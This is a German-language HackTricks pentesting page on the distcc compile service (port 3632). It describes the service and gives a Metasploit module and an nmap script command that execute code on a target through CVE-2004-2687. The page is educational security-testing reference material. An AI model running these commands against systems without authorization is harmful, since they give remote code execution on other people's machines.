hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.4 KiB

{% hint style="success" %} Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks
{% endhint %}

Grundinformationen

Distcc ist ein Tool, das den Kompilierungsprozess verbessert, indem es die unbenutzte Rechenleistung anderer Computer im Netzwerk nutzt. Wenn distcc auf einem Rechner eingerichtet ist, kann dieser Rechner seine Kompilierungsaufgaben an ein anderes System verteilen. Dieses empfangende System muss den distccd-Daemon ausführen und einen kompatiblen Compiler installiert haben, um den gesendeten Code zu verarbeiten.

Standardport: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Überprüfen Sie, ob es anfällig für CVE-2004-2687 ist, um beliebigen Code auszuführen:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Ich glaube nicht, dass Shodan diesen Dienst erkennt.

Ressourcen

Beitrag erstellt von Álex B (@r1p)

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks
{% endhint %}